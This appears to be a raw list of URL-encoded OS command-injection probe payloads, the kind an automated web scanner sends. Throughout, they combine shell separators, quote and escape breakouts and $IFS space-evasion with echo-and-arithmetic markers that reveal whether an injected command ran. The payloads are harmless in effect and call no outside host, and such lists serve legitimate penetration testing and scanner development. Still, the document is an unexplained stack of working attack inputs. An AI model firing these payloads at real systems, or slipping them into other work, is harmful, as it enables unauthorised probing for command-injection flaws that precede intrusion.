+||echo$IFSGJJLJU$((79%2B31))$(echo$IFSGJJLJU)GJJLJU%5C%5C +&&echo$IFSJKTFHJ$((76%2B41))$(echo$IFSJKTFHJ)JKTFHJ%5C%5C +%0aecho$IFSXLUCPI$((48%2B78))$(echo$IFSXLUCPI)XLUCPI%5C%5C +%3Becho$IFSNAZRRA$((96%2B66))$(echo$IFSNAZRRA)NAZRRA%5C%5C +%26echo$IFSOVSHWQ$((85%2B7))$(echo$IFSOVSHWQ)OVSHWQ%5C%5C +%26%26echo$IFSBLLPPH$((41%2B65))$(echo$IFSBLLPPH)BLLPPH%5C%5C +%7Cecho$IFSSSATLL$((5%2B73))$(echo$IFSSSATLL)SSATLL%5C%5C +%7C%7Cecho$IFSPZVPFS$((15%2B73))$(echo$IFSPZVPFS)PZVPFS%5C%5C +echo$IFSPDGOWG$((0%2B24))$(echo$IFSPDGOWG)PDGOWG%2F%2F +%20echo%20BZWIPM$((39%2B43))$(echo%20BZWIPM)BZWIPM%2F%2F +;echo$IFSMPQJPO$((25%2B59))$(echo$IFSMPQJPO)MPQJPO%2F%2F +&echo$IFSYCZAGJ$((43%2B61))$(echo$IFSYCZAGJ)YCZAGJ%2F%2F +|echo$IFSKBEHVQ$((68%2B63))$(echo$IFSKBEHVQ)KBEHVQ%2F%2F +||echo$IFSFXXJSB$((43%2B97))$(echo$IFSFXXJSB)FXXJSB%2F%2F +&&echo$IFSGYBOFQ$((1%2B26))$(echo$IFSGYBOFQ)GYBOFQ%2F%2F +%0aecho$IFSSAUSPH$((85%2B99))$(echo$IFSSAUSPH)SAUSPH%2F%2F +%3Becho$IFSMEDOMQ$((22%2B39))$(echo$IFSMEDOMQ)MEDOMQ%2F%2F +%26echo$IFSSCACNS$((89%2B8))$(echo$IFSSCACNS)SCACNS%2F%2F +%26%26echo$IFSBWMKQC$((8%2B22))$(echo$IFSBWMKQC)BWMKQC%2F%2F +%7Cecho$IFSACSCAR$((68%2B50))$(echo$IFSACSCAR)ACSCAR%2F%2F +%7C%7Cecho$IFSIUFXEF$((53%2B74))$(echo$IFSIUFXEF)IUFXEF%2F%2F +echo$IFSODFQBQ$((97%2B35))$(echo$IFSODFQBQ)ODFQBQ%26 +%20echo%20MIJFWA$((64%2B47))$(echo%20MIJFWA)MIJFWA%26 +;echo$IFSORHOEA$((71%2B59))$(echo$IFSORHOEA)ORHOEA%26 +&echo$IFSASRUTA$((40%2B74))$(echo$IFSASRUTA)ASRUTA%26 +|echo$IFSNAGEDU$((57%2B86))$(echo$IFSNAGEDU)NAGEDU%26 +||echo$IFSCZXGHY$((46%2B9))$(echo$IFSCZXGHY)CZXGHY%26 +&&echo$IFSNIEFDN$((50%2B18))$(echo$IFSNIEFDN)NIEFDN%26 +%0aecho$IFSLHUMDB$((44%2B69))$(echo$IFSLHUMDB)LHUMDB%26 +%3Becho$IFSSWBWIU$((54%2B20))$(echo$IFSSWBWIU)SWBWIU%26 +%26echo$IFSRNWYRS$((8%2B9))$(echo$IFSRNWYRS)RNWYRS%26 +%26%26echo$IFSRYMPKL$((65%2B92))$(echo$IFSRYMPKL)RYMPKL%26 +%7Cecho$IFSSHWGOU$((49%2B48))$(echo$IFSSHWGOU)SHWGOU%26 +%7C%7Cecho$IFSHOZWON$((0%2B42))$(echo$IFSHOZWON)HOZWON%26 +echo$IFSCTYHYD$((2%2B94))$(echo$IFSCTYHYD)CTYHYD%7C +%20echo%20FKYLQT$((77%2B70))$(echo%20FKYLQT)FKYLQT%7C +;echo$IFSXSICUY$((6%2B35))$(echo$IFSXSICUY)XSICUY%7C +&echo$IFSCQTRHA$((48%2B25))$(echo$IFSCQTRHA)CQTRHA%7C +|echo$IFSSZYRBG$((69%2B52))$(echo$IFSSZYRBG)SZYRBG%7C +||echo$IFSOSSFDF$((81%2B9))$(echo$IFSOSSFDF)OSSFDF%7C +&&echo$IFSIIUTLW$((40%2B43))$(echo$IFSIIUTLW)IIUTLW%7C +%0aecho$IFSIEMDKC$((84%2B27))$(echo$IFSIEMDKC)IEMDKC%7C +%3Becho$IFSJJRDLY$((50%2B38))$(echo$IFSJJRDLY)JJRDLY%7C +%26echo$IFSKKDTAV$((24%2B52))$(echo$IFSKKDTAV)KKDTAV%7C +%26%26echo$IFSHKTTXB$((80%2B17))$(echo$IFSHKTTXB)HKTTXB%7C +%7Cecho$IFSBJUKKI$((91%2B15))$(echo$IFSBJUKKI)BJUKKI%7C +%7C%7Cecho$IFSWFBDXM$((8%2B58))$(echo$IFSWFBDXM)WFBDXM%7C +'echo$IFSMEFODD$((49%2B43))$(echo$IFSMEFODD)MEFODD +'%20echo%20DKPBFA$((11%2B2))$(echo%20DKPBFA)DKPBFA +';echo$IFSJNEQYI$((45%2B53))$(echo$IFSJNEQYI)JNEQYI +'&echo$IFSVXICUW$((74%2B51))$(echo$IFSVXICUW)VXICUW +'|echo$IFSBJGHKO$((79%2B18))$(echo$IFSBJGHKO)BJGHKO +'||echo$IFSHMEDQM$((69%2B73))$(echo$IFSHMEDQM)HMEDQM +'&&echo$IFSNKJIAU$((64%2B2))$(echo$IFSNKJIAU)NKJIAU +'%0aecho$IFSDENYJC$((91%2B76))$(echo$IFSDENYJC)DENYJC +'%3Becho$IFSVZDGLS$((78%2B51))$(echo$IFSVZDGLS)VZDGLS +'%26echo$IFSMYWSGV$((8%2B92))$(echo$IFSMYWSGV)MYWSGV +'%26%26echo$IFSSDYEBH$((96%2B90))$(echo$IFSSDYEBH)SDYEBH +'%7Cecho$IFSKVFINL$((98%2B1))$(echo$IFSKVFINL)KVFINL +'%7C%7Cecho$IFSBNFEWG$((17%2B39))$(echo$IFSBNFEWG)BNFEWG +'echo$IFSEOXXHA$((67%2B86))$(echo$IFSEOXXHA)EOXXHA' +'%20echo%20ROHIPP$((50%2B29))$(echo%20ROHIPP)ROHIPP' +';echo$IFSRFBYSO$((8%2B13))$(echo$IFSRFBYSO)RFBYSO' +'&echo$IFSIZVZGQ$((7%2B67))$(echo$IFSIZVZGQ)IZVZGQ' +'|echo$IFSANVKGR$((37%2B60))$(echo$IFSANVKGR)ANVKGR' +'||echo$IFSVBATPV$((60%2B79))$(echo$IFSVBATPV)VBATPV' +'&&echo$IFSGYGLII$((94%2B74))$(echo$IFSGYGLII)GYGLII' +'%0aecho$IFSEPGLGV$((67%2B48))$(echo$IFSEPGLGV)EPGLGV' +'%3Becho$IFSXZROZE$((34%2B62))$(echo$IFSXZROZE)XZROZE' +'%26echo$IFSTYRLAC$((15%2B80))$(echo$IFSTYRLAC)TYRLAC' +'%26%26echo$IFSRFOIHP$((11%2B2))$(echo$IFSRFOIHP)RFOIHP' +'%7Cecho$IFSRRSKSU$((82%2B69))$(echo$IFSRRSKSU)RRSKSU' +'%7C%7Cecho$IFSTCDXDV$((24%2B86))$(echo$IFSTCDXDV)TCDXDV' +'echo$IFSJWHAWX$((24%2B49))$(echo$IFSJWHAWX)JWHAWX" +'%20echo%20DHXKNT$((83%2B17))$(echo%20DHXKNT)DHXKNT" +';echo$IFSIYVDAV$((58%2B88))$(echo$IFSIYVDAV)IYVDAV" +'&echo$IFSUSKOQC$((80%2B64))$(echo$IFSUSKOQC)USKOQC" +'|echo$IFSPZXCHL$((23%2B27))$(echo$IFSPZXCHL)PZXCHL" +'||echo$IFSHZAALW$((51%2B4))$(echo$IFSHZAALW)HZAALW" +'&&echo$IFSBDQKRH$((34%2B46))$(echo$IFSBDQKRH)BDQKRH" +'%0aecho$IFSJQCWHP$((66%2B43))$(echo$IFSJQCWHP)JQCWHP" +'%3Becho$IFSAOVBIV$((21%2B3))$(echo$IFSAOVBIV)AOVBIV" +'%26echo$IFSSYOFDN$((87%2B15))$(echo$IFSSYOFDN)SYOFDN" +'%26%26echo$IFSTIZZUZ$((99%2B85))$(echo$IFSTIZZUZ)TIZZUZ" +'%7Cecho$IFSYCCUIZ$((60%2B63))$(echo$IFSYCCUIZ)YCCUIZ" +'%7C%7Cecho$IFSVFIJUP$((58%2B16))$(echo$IFSVFIJUP)VFIJUP" +'echo$IFSKZIGXE$((85%2B95))$(echo$IFSKZIGXE)KZIGXE +'%20echo%20IILRDW$((70%2B47))$(echo%20IILRDW)IILRDW +';echo$IFSHXTARE$((60%2B40))$(echo$IFSHXTARE)HXTARE +'&echo$IFSZFQGSY$((67%2B86))$(echo$IFSZFQGSY)ZFQGSY +'|echo$IFSBTCBHW$((54%2B8))$(echo$IFSBTCBHW)BTCBHW +'||echo$IFSTQUEWX$((62%2B61))$(echo$IFSTQUEWX)TQUEWX +'&&echo$IFSQCRXUV$((17%2B13))$(echo$IFSQCRXUV)QCRXUV +'%0aecho$IFSUOWFKR$((67%2B63))$(echo$IFSUOWFKR)UOWFKR +'%3Becho$IFSTJRXTN$((69%2B61))$(echo$IFSTJRXTN)TJRXTN +'%26echo$IFSDVJEEK$((20%2B0))$(echo$IFSDVJEEK)DVJEEK +'%26%26echo$IFSNIRIZQ$((64%2B4))$(echo$IFSNIRIZQ)NIRIZQ +'%7Cecho$IFSFGVWTS$((53%2B41))$(echo$IFSFGVWTS)FGVWTS +'%7C%7Cecho$IFSONXHJN$((84%2B16))$(echo$IFSONXHJN)ONXHJN +'echo$IFSMHUBAH$((13%2B52))$(echo$IFSMHUBAH)MHUBAH// +'%20echo%20OBUGDN$((69%2B8))$(echo%20OBUGDN)OBUGDN// +';echo$IFSZQZKMV$((83%2B46))$(echo$IFSZQZKMV)ZQZKMV// +'&echo$IFSDJQYUP$((21%2B12))$(echo$IFSDJQYUP)DJQYUP// +'|echo$IFSXMLIVZ$((57%2B49))$(echo$IFSXMLIVZ)XMLIVZ// +'||echo$IFSHBYFDI$((44%2B65))$(echo$IFSHBYFDI)HBYFDI// +'&&echo$IFSWCCAON$((69%2B13))$(echo$IFSWCCAON)WCCAON// +'%0aecho$IFSWHMVQH$((51%2B53))$(echo$IFSWHMVQH)WHMVQH// +'%3Becho$IFSTMWIFK$((5%2B69))$(echo$IFSTMWIFK)TMWIFK// +'%26echo$IFSZJHAFI$((51%2B78))$(echo$IFSZJHAFI)ZJHAFI// +'%26%26echo$IFSDSUEVY$((21%2B5))$(echo$IFSDSUEVY)DSUEVY// +'%7Cecho$IFSHUIGCW$((90%2B23))$(echo$IFSHUIGCW)HUIGCW// +'%7C%7Cecho$IFSBSPLUO$((96%2B67))$(echo$IFSBSPLUO)BSPLUO// +'echo$IFSWTMGEX$((31%2B97))$(echo$IFSWTMGEX)WTMGEX\ +'%20echo%20YLUZLM$((52%2B54))$(echo%20YLUZLM)YLUZLM\ +';echo$IFSYRIWFC$((51%2B76))$(echo$IFSYRIWFC)YRIWFC\ +'&echo$IFSHDKHON$((74%2B41))$(echo$IFSHDKHON)HDKHON\ +'|echo$IFSQMGDOR$((26%2B14))$(echo$IFSQMGDOR)QMGDOR\ +'||echo$IFSVWMBCL$((58%2B34))$(echo$IFSVWMBCL)VWMBCL\ +'&&echo$IFSAECLDN$((15%2B72))$(echo$IFSAECLDN)AECLDN\ +'%0aecho$IFSLLJNSS$((65%2B11))$(echo$IFSLLJNSS)LLJNSS\ +'%3Becho$IFSYIYMKI$((91%2B72))$(echo$IFSYIYMKI)YIYMKI\ +'%26echo$IFSANEBTG$((60%2B67))$(echo$IFSANEBTG)ANEBTG\ +'%26%26echo$IFSLLLNBB$((5%2B69))$(echo$IFSLLLNBB)LLLNBB\ +'%7Cecho$IFSDUIYBT$((30%2B8))$(echo$IFSDUIYBT)DUIYBT\ +'%7C%7Cecho$IFSBZCSNS$((71%2B69))$(echo$IFSBZCSNS)BZCSNS\ +'echo$IFSUCMQAW$((90%2B56))$(echo$IFSUCMQAW)UCMQAW& +'%20echo%20MCIHDY$((46%2B63))$(echo%20MCIHDY)MCIHDY& +';echo$IFSTXFXOH$((52%2B49))$(echo$IFSTXFXOH)TXFXOH& +'&echo$IFSJGGFVO$((61%2B53))$(echo$IFSJGGFVO)JGGFVO& +'|echo$IFSFUKEZB$((71%2B34))$(echo$IFSFUKEZB)FUKEZB& +'||echo$IFSDBSTLF$((93%2B67))$(echo$IFSDBSTLF)DBSTLF& +'&&echo$IFSJJWTOM$((43%2B29))$(echo$IFSJJWTOM)JJWTOM& +'%0aecho$IFSUZEOGM$((31%2B46))$(echo$IFSUZEOGM)UZEOGM& +'%3Becho$IFSMWZRJO$((7%2B81))$(echo$IFSMWZRJO)MWZRJO& +'%26echo$IFSFRPBJA$((6%2B14))$(echo$IFSFRPBJA)FRPBJA& +'%26%26echo$IFSLRQJZI$((98%2B24))$(echo$IFSLRQJZI)LRQJZI& +'%7Cecho$IFSHYUMCY$((48%2B63))$(echo$IFSHYUMCY)HYUMCY& +'%7C%7Cecho$IFSJMIQOC$((14%2B31))$(echo$IFSJMIQOC)JMIQOC& +'echo$IFSKFKPRE$((22%2B12))$(echo$IFSKFKPRE)KFKPRE| +'%20echo%20HYHGIN$((59%2B21))$(echo%20HYHGIN)HYHGIN| +';echo$IFSTDCNYP$((73%2B27))$(echo$IFSTDCNYP)TDCNYP| +'&echo$IFSJSKJAE$((33%2B64))$(echo$IFSJSKJAE)JSKJAE| +'|echo$IFSFRUDYQ$((30%2B6))$(echo$IFSFRUDYQ)FRUDYQ| +'||echo$IFSACFFZC$((29%2B51))$(echo$IFSACFFZC)ACFFZC| +'&&echo$IFSDSTIDD$((87%2B89))$(echo$IFSDSTIDD)DSTIDD| +'%0aecho$IFSOMOAWG$((37%2B16))$(echo$IFSOMOAWG)OMOAWG| +'%3Becho$IFSAWTTNW$((97%2B93))$(echo$IFSAWTTNW)AWTTNW| +'%26echo$IFSYOYHYT$((87%2B32))$(echo$IFSYOYHYT)YOYHYT| +'%26%26echo$IFSOSNMTB$((17%2B53))$(echo$IFSOSNMTB)OSNMTB| +'%7Cecho$IFSRSOBXL$((32%2B20))$(echo$IFSRSOBXL)RSOBXL| +'%7C%7Cecho$IFSIYFUTC$((35%2B6))$(echo$IFSIYFUTC)IYFUTC| +'echo$IFSZAZMGS$((53%2B59))$(echo$IFSZAZMGS)ZAZMGS%27 +'%20echo%20DHZGBM$((36%2B86))$(echo%20DHZGBM)DHZGBM%27 +';echo$IFSTVUUPM$((41%2B77))$(echo$IFSTVUUPM)TVUUPM%27 +'&echo$IFSQKZYPP$((55%2B27))$(echo$IFSQKZYPP)QKZYPP%27 +'|echo$IFSMTYEZK$((2%2B28))$(echo$IFSMTYEZK)MTYEZK%27 +'||echo$IFSUYEKYZ$((46%2B2))$(echo$IFSUYEKYZ)UYEKYZ%27 +'&&echo$IFSUGEJWF$((34%2B81))$(echo$IFSUGEJWF)UGEJWF%27 +'%0aecho$IFSCSOREC$((72%2B24))$(echo$IFSCSOREC)CSOREC%27 +'%3Becho$IFSXQAHUL$((9%2B99))$(echo$IFSXQAHUL)XQAHUL%27 +'%26echo$IFSYKAMSD$((84%2B71))$(echo$IFSYKAMSD)YKAMSD%27 +'%26%26echo$IFSYILVWF$((53%2B73))$(echo$IFSYILVWF)YILVWF%27 +'%7Cecho$IFSDZZJRA$((36%2B84))$(echo$IFSDZZJRA)DZZJRA%27 +'%7C%7Cecho$IFSXSKAQD$((19%2B93))$(echo$IFSXSKAQD)XSKAQD%27 +'echo$IFSQUCSSY$((71%2B59))$(echo$IFSQUCSSY)QUCSSY%22 +'%20echo%20SZQVUT$((92%2B45))$(echo%20SZQVUT)SZQVUT%22 +';echo$IFSRXCILT$((66%2B76))$(echo$IFSRXCILT)RXCILT%22 +'&echo$IFSQYHHIE$((90%2B44))$(echo$IFSQYHHIE)QYHHIE%22 +'|echo$IFSUDMWDN$((49%2B29))$(echo$IFSUDMWDN)UDMWDN%22 +'||echo$IFSCOBRKP$((22%2B48))$(echo$IFSCOBRKP)COBRKP%22 +'&&echo$IFSRXIGIR$((86%2B76))$(echo$IFSRXIGIR)RXIGIR%22 +'%0aecho$IFSKNXEIF$((67%2B64))$(echo$IFSKNXEIF)KNXEIF%22 +'%3Becho$IFSGKNHWZ$((67%2B92))$(echo$IFSGKNHWZ)GKNHWZ%22 +'%26echo$IFSZZQBNP$((52%2B31))$(echo$IFSZZQBNP)ZZQBNP%22 +'%26%26echo$IFSRGMUUX$((81%2B39))$(echo$IFSRGMUUX)RGMUUX%22 +'%7Cecho$IFSGRFQBP$((21%2B44))$(echo$IFSGRFQBP)GRFQBP%22 +'%7C%7Cecho$IFSYIJMHI$((78%2B15))$(echo$IFSYIJMHI)YIJMHI%22 +'echo$IFSATMXIQ$((94%2B83))$(echo$IFSATMXIQ)ATMXIQ%5C%5C +'%20echo%20QIIZIS$((83%2B28))$(echo%20QIIZIS)QIIZIS%5C%5C +';echo$IFSOGZZLG$((82%2B8))$(echo$IFSOGZZLG)OGZZLG%5C%5C +'&echo$IFSSFRDQJ$((5%2B47))$(echo$IFSSFRDQJ)SFRDQJ%5C%5C +'|echo$IFSBLUOBR$((48%2B93))$(echo$IFSBLUOBR)BLUOBR%5C%5C +'||echo$IFSWPLOYN$((11%2B61))$(echo$IFSWPLOYN)WPLOYN%5C%5C +'&&echo$IFSEEAOWX$((31%2B37))$(echo$IFSEEAOWX)EEAOWX%5C%5C +'%0aecho$IFSMRGXMQ$((93%2B20))$(echo$IFSMRGXMQ)MRGXMQ%5C%5C +'%3Becho$IFSZIXZTA$((54%2B19))$(echo$IFSZIXZTA)ZIXZTA%5C%5C +'%26echo$IFSQJCJTG$((15%2B71))$(echo$IFSQJCJTG)QJCJTG%5C%5C +'%26%26echo$IFSWGUUQS$((22%2B59))$(echo$IFSWGUUQS)WGUUQS%5C%5C +'%7Cecho$IFSNOZCLT$((80%2B49))$(echo$IFSNOZCLT)NOZCLT%5C%5C +'%7C%7Cecho$IFSFOGUOT$((12%2B4))$(echo$IFSFOGUOT)FOGUOT%5C%5C +'echo$IFSFMBTIT$((34%2B36))$(echo$IFSFMBTIT)FMBTIT%2F%2F +'%20echo%20LCUPUI$((67%2B12))$(echo%20LCUPUI)LCUPUI%2F%2F +';echo$IFSYSBEUY$((50%2B96))$(echo$IFSYSBEUY)YSBEUY%2F%2F +'&echo$IFSGOHLRL$((41%2B27))$(echo$IFSGOHLRL)GOHLRL%2F%2F +'|echo$IFSLBYJEO$((76%2B85))$(echo$IFSLBYJEO)LBYJEO%2F%2F +'||echo$IFSBGABHN$((68%2B69))$(echo$IFSBGABHN)BGABHN%2F%2F +'&&echo$IFSARLFCX$((76%2B3))$(echo$IFSARLFCX)ARLFCX%2F%2F +'%0aecho$IFSJVJBOI$((72%2B33))$(echo$IFSJVJBOI)JVJBOI%2F%2F +'%3Becho$IFSYYDENG$((25%2B38))$(echo$IFSYYDENG)YYDENG%2F%2F +'%26echo$IFSSGWYGH$((17%2B18))$(echo$IFSSGWYGH)SGWYGH%2F%2F +'%26%26echo$IFSQGCAOI$((72%2B57))$(echo$IFSQGCAOI)QGCAOI%2F%2F +'%7Cecho$IFSHISNBC$((79%2B7))$(echo$IFSHISNBC)HISNBC%2F%2F +'%7C%7Cecho$IFSZFQBBS$((42%2B5))$(echo$IFSZFQBBS)ZFQBBS%2F%2F +'echo$IFSMDCMCB$((27%2B53))$(echo$IFSMDCMCB)MDCMCB%26 +'%20echo%20CXKSQZ$((18%2B22))$(echo%20CXKSQZ)CXKSQZ%26 +';echo$IFSPICODU$((19%2B82))$(echo$IFSPICODU)PICODU%26 +'&echo$IFSCHNLIU$((42%2B39))$(echo$IFSCHNLIU)CHNLIU%26 +'|echo$IFSGCIZYI$((9%2B92))$(echo$IFSGCIZYI)GCIZYI%26 +'||echo$IFSNWOOGT$((48%2B45))$(echo$IFSNWOOGT)NWOOGT%26 +'&&echo$IFSZRWXZK$((81%2B67))$(echo$IFSZRWXZK)ZRWXZK%26 +'%0aecho$IFSWTIGNL$((88%2B19))$(echo$IFSWTIGNL)WTIGNL%26 +'%3Becho$IFSGOOQAC$((3%2B23))$(echo$IFSGOOQAC)GOOQAC%26 +'%26echo$IFSCAIGIC$((51%2B44))$(echo$IFSCAIGIC)CAIGIC%26 +'%26%26echo$IFSBGZLBN$((42%2B92))$(echo$IFSBGZLBN)BGZLBN%26 +'%7Cecho$IFSALJRYG$((7%2B49))$(echo$IFSALJRYG)ALJRYG%26 +'%7C%7Cecho$IFSTXFGBP$((28%2B0))$(echo$IFSTXFGBP)TXFGBP%26 +'echo$IFSXCUTCE$((23%2B12))$(echo$IFSXCUTCE)XCUTCE%7C +'%20echo%20UHJUHS$((68%2B93))$(echo%20UHJUHS)UHJUHS%7C +';echo$IFSKZCKOJ$((33%2B6))$(echo$IFSKZCKOJ)KZCKOJ%7C +'&echo$IFSKFDAKU$((72%2B93))$(echo$IFSKFDAKU)KFDAKU%7C +'|echo$IFSNAFNWQ$((47%2B44))$(echo$IFSNAFNWQ)NAFNWQ%7C +'||echo$IFSTVWVBO$((17%2B96))$(echo$IFSTVWVBO)TVWVBO%7C +'&&echo$IFSYZQQKL$((73%2B37))$(echo$IFSYZQQKL)YZQQKL%7C +'%0aecho$IFSMOMQCI$((63%2B38))$(echo$IFSMOMQCI)MOMQCI%7C +'%3Becho$IFSRTEEYZ$((93%2B75))$(echo$IFSRTEEYZ)RTEEYZ%7C +'%26echo$IFSZYAICF$((49%2B53))$(echo$IFSZYAICF)ZYAICF%7C +'%26%26echo$IFSZZSVXZ$((46%2B81))$(echo$IFSZZSVXZ)ZZSVXZ%7C +'%7Cecho$IFSOIATXB$((46%2B82))$(echo$IFSOIATXB)OIATXB%7C +'%7C%7Cecho$IFSYOKPWL$((89%2B42))$(echo$IFSYOKPWL)YOKPWL%7C +"echo$IFSWKATIV$((60%2B61))$(echo$IFSWKATIV)WKATIV +"%20echo%20CWUIKD$((41%2B30))$(echo%20CWUIKD)CWUIKD +";echo$IFSJQUSPM$((11%2B2))$(echo$IFSJQUSPM)JQUSPM +"&echo$IFSVJUTHP$((96%2B68))$(echo$IFSVJUTHP)VJUTHP +"|echo$IFSGCRAHC$((53%2B91))$(echo$IFSGCRAHC)GCRAHC +"||echo$IFSCCZBZV$((42%2B82))$(echo$IFSCCZBZV)CCZBZV +"&&echo$IFSJOVRVD$((49%2B70))$(echo$IFSJOVRVD)JOVRVD +"%0aecho$IFSBJURAW$((1%2B97))$(echo$IFSBJURAW)BJURAW +"%3Becho$IFSSTVHDV$((56%2B21))$(echo$IFSSTVHDV)STVHDV +"%26echo$IFSKWABXB$((17%2B13))$(echo$IFSKWABXB)KWABXB +"%26%26echo$IFSBVWEHE$((52%2B69))$(echo$IFSBVWEHE)BVWEHE +"%7Cecho$IFSMHELRN$((54%2B12))$(echo$IFSMHELRN)MHELRN +"%7C%7Cecho$IFSJPDBGK$((58%2B46))$(echo$IFSJPDBGK)JPDBGK +"echo$IFSHHTXHL$((49%2B36))$(echo$IFSHHTXHL)HHTXHL' +"%20echo%20NTZGVY$((19%2B34))$(echo%20NTZGVY)NTZGVY' +";echo$IFSWBYLKV$((50%2B27))$(echo$IFSWBYLKV)WBYLKV' +"&echo$IFSKWIQTS$((57%2B77))$(echo$IFSKWIQTS)KWIQTS' +"|echo$IFSVXVEBJ$((90%2B87))$(echo$IFSVXVEBJ)VXVEBJ' +"||echo$IFSUGINJP$((61%2B39))$(echo$IFSUGINJP)UGINJP' +"&&echo$IFSCVWJPC$((74%2B17))$(echo$IFSCVWJPC)CVWJPC' +"%0aecho$IFSSGWCNL$((73%2B94))$(echo$IFSSGWCNL)SGWCNL' +"%3Becho$IFSVRATKU$((73%2B43))$(echo$IFSVRATKU)VRATKU' +"%26echo$IFSSDEPLL$((89%2B42))$(echo$IFSSDEPLL)SDEPLL' +"%26%26echo$IFSRXEECQ$((1%2B1))$(echo$IFSRXEECQ)RXEECQ' +"%7Cecho$IFSZQOGYN$((31%2B70))$(echo$IFSZQOGYN)ZQOGYN' +"%7C%7Cecho$IFSRHCEJU$((43%2B33))$(echo$IFSRHCEJU)RHCEJU' +"echo$IFSVORHKR$((32%2B24))$(echo$IFSVORHKR)VORHKR" +"%20echo%20WFBQGI$((90%2B90))$(echo%20WFBQGI)WFBQGI" +";echo$IFSGDUPZJ$((65%2B72))$(echo$IFSGDUPZJ)GDUPZJ" +"&echo$IFSYFXZZL$((57%2B13))$(echo$IFSYFXZZL)YFXZZL" +"|echo$IFSAWVDZZ$((61%2B5))$(echo$IFSAWVDZZ)AWVDZZ" +"||echo$IFSXECQXX$((94%2B39))$(echo$IFSXECQXX)XECQXX" +"&&echo$IFSEQTTBQ$((35%2B0))$(echo$IFSEQTTBQ)EQTTBQ" +"%0aecho$IFSPHPXFU$((67%2B50))$(echo$IFSPHPXFU)PHPXFU" +"%3Becho$IFSVICXTN$((37%2B41))$(echo$IFSVICXTN)VICXTN" +"%26echo$IFSWXTKDI$((17%2B67))$(echo$IFSWXTKDI)WXTKDI" +"%26%26echo$IFSRPIHYW$((91%2B37))$(echo$IFSRPIHYW)RPIHYW" +"%7Cecho$IFSUDEEGX$((28%2B85))$(echo$IFSUDEEGX)UDEEGX" +"%7C%7Cecho$IFSZMOHUU$((94%2B69))$(echo$IFSZMOHUU)ZMOHUU" +"echo$IFSONMQKM$((22%2B28))$(echo$IFSONMQKM)ONMQKM +"%20echo%20UUXKTB$((57%2B32))$(echo%20UUXKTB)UUXKTB +";echo$IFSVYMVPZ$((67%2B64))$(echo$IFSVYMVPZ)VYMVPZ +"&echo$IFSGFEHZK$((68%2B85))$(echo$IFSGFEHZK)GFEHZK +"|echo$IFSIQCTBX$((54%2B92))$(echo$IFSIQCTBX)IQCTBX +"||echo$IFSYDFXUN$((70%2B11))$(echo$IFSYDFXUN)YDFXUN +"&&echo$IFSKOPNEP$((92%2B7))$(echo$IFSKOPNEP)KOPNEP +"%0aecho$IFSDWMULK$((25%2B34))$(echo$IFSDWMULK)DWMULK +"%3Becho$IFSHCBWBH$((0%2B48))$(echo$IFSHCBWBH)HCBWBH +"%26echo$IFSPSTQXK$((12%2B96))$(echo$IFSPSTQXK)PSTQXK +"%26%26echo$IFSMCAKIV$((64%2B5))$(echo$IFSMCAKIV)MCAKIV +"%7Cecho$IFSNOSUCK$((35%2B11))$(echo$IFSNOSUCK)NOSUCK +"%7C%7Cecho$IFSCERCHU$((13%2B46))$(echo$IFSCERCHU)CERCHU +"echo$IFSETATEF$((80%2B79))$(echo$IFSETATEF)ETATEF// +"%20echo%20HWUZPQ$((82%2B33))$(echo%20HWUZPQ)HWUZPQ// +";echo$IFSLFGEOY$((22%2B44))$(echo$IFSLFGEOY)LFGEOY// +"&echo$IFSZVPWKP$((79%2B81))$(echo$IFSZVPWKP)ZVPWKP// +"|echo$IFSXSEOTZ$((78%2B18))$(echo$IFSXSEOTZ)XSEOTZ// +"||echo$IFSTCCUHM$((72%2B61))$(echo$IFSTCCUHM)TCCUHM// +"&&echo$IFSWPYOYT$((86%2B46))$(echo$IFSWPYOYT)WPYOYT// +"%0aecho$IFSEIOLQJ$((69%2B36))$(echo$IFSEIOLQJ)EIOLQJ// +"%3Becho$IFSXVUYIQ$((97%2B2))$(echo$IFSXVUYIQ)XVUYIQ// +"%26echo$IFSDYXXSS$((94%2B60))$(echo$IFSDYXXSS)DYXXSS// +"%26%26echo$IFSYMBKLY$((55%2B32))$(echo$IFSYMBKLY)YMBKLY// +"%7Cecho$IFSVHLPZW$((76%2B16))$(echo$IFSVHLPZW)VHLPZW// +"%7C%7Cecho$IFSLZOZUN$((8%2B81))$(echo$IFSLZOZUN)LZOZUN// +"echo$IFSSYFQAU$((37%2B78))$(echo$IFSSYFQAU)SYFQAU\ +"%20echo%20GEWHYE$((65%2B76))$(echo%20GEWHYE)GEWHYE\ +";echo$IFSSXCKTB$((75%2B80))$(echo$IFSSXCKTB)SXCKTB\ +"&echo$IFSWZXINW$((50%2B11))$(echo$IFSWZXINW)WZXINW\ +"|echo$IFSJTANTD$((65%2B98))$(echo$IFSJTANTD)JTANTD\ +"||echo$IFSJIAXIU$((62%2B56))$(echo$IFSJIAXIU)JIAXIU\ +"&&echo$IFSOONZCK$((32%2B38))$(echo$IFSOONZCK)OONZCK\ +"%0aecho$IFSRFLPIG$((74%2B10))$(echo$IFSRFLPIG)RFLPIG\ +"%3Becho$IFSHBDBVM$((41%2B30))$(echo$IFSHBDBVM)HBDBVM\ +"%26echo$IFSOUNXWG$((62%2B52))$(echo$IFSOUNXWG)OUNXWG\ +"%26%26echo$IFSVZSMDF$((4%2B77))$(echo$IFSVZSMDF)VZSMDF\ +"%7Cecho$IFSLHIZNN$((66%2B97))$(echo$IFSLHIZNN)LHIZNN\ +"%7C%7Cecho$IFSAEEFTZ$((12%2B71))$(echo$IFSAEEFTZ)AEEFTZ\ +"echo$IFSGOPZNT$((61%2B76))$(echo$IFSGOPZNT)GOPZNT& +"%20echo%20WVCQTP$((98%2B15))$(echo%20WVCQTP)WVCQTP& +";echo$IFSZCTRZI$((60%2B12))$(echo$IFSZCTRZI)ZCTRZI& +"&echo$IFSNMBAUD$((42%2B5))$(echo$IFSNMBAUD)NMBAUD& +"|echo$IFSXDHKIF$((56%2B17))$(echo$IFSXDHKIF)XDHKIF& +"||echo$IFSUQNTQG$((30%2B73))$(echo$IFSUQNTQG)UQNTQG& +"&&echo$IFSMMQAGA$((77%2B46))$(echo$IFSMMQAGA)MMQAGA& +"%0aecho$IFSBPLBPT$((48%2B38))$(echo$IFSBPLBPT)BPLBPT& +"%3Becho$IFSERJEHG$((25%2B7))$(echo$IFSERJEHG)ERJEHG& +"%26echo$IFSDGFAYX$((17%2B31))$(echo$IFSDGFAYX)DGFAYX& +"%26%26echo$IFSTIIXMB$((16%2B84))$(echo$IFSTIIXMB)TIIXMB& +"%7Cecho$IFSNXFWKE$((5%2B33))$(echo$IFSNXFWKE)NXFWKE& 